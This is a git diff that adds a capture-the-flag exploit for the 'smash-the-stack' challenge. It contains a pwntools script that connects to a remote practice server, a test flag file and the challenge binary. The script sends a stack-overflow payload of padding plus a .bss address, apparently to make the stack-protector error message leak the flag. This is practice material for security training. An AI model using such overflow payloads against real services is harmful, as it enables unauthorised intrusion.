diff --git a/canary/smash-the-stack/answer.py b/canary/smash-the-stack/answer.py
new file mode 100644
index 0000000..36eb079
--- /dev/null
+++ b/canary/smash-the-stack/answer.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7717)
+#p = process('./smash-the-stack')
+elf = ELF('./smash-the-stack')
+
+buff_bss = elf.sym['buff']
+
+payload = 0xbc*'a' + p32(buff_bss)
+p.sendline(payload)
+
+p.interactive()
diff --git a/canary/smash-the-stack/flag b/canary/smash-the-stack/flag
new file mode 100644
index 0000000..f4e4fb8
--- /dev/null
+++ b/canary/smash-the-stack/flag
@@ -0,0 +1 @@
+flag{this-is-a-test-flag-this-is-a-test-flag}
diff --git a/canary/smash-the-stack/smash-the-stack b/canary/smash-the-stack/smash-the-stack
new file mode 100755
index 0000000..7f5d780
Binary files /dev/null and b/canary/smash-the-stack/smash-the-stack differ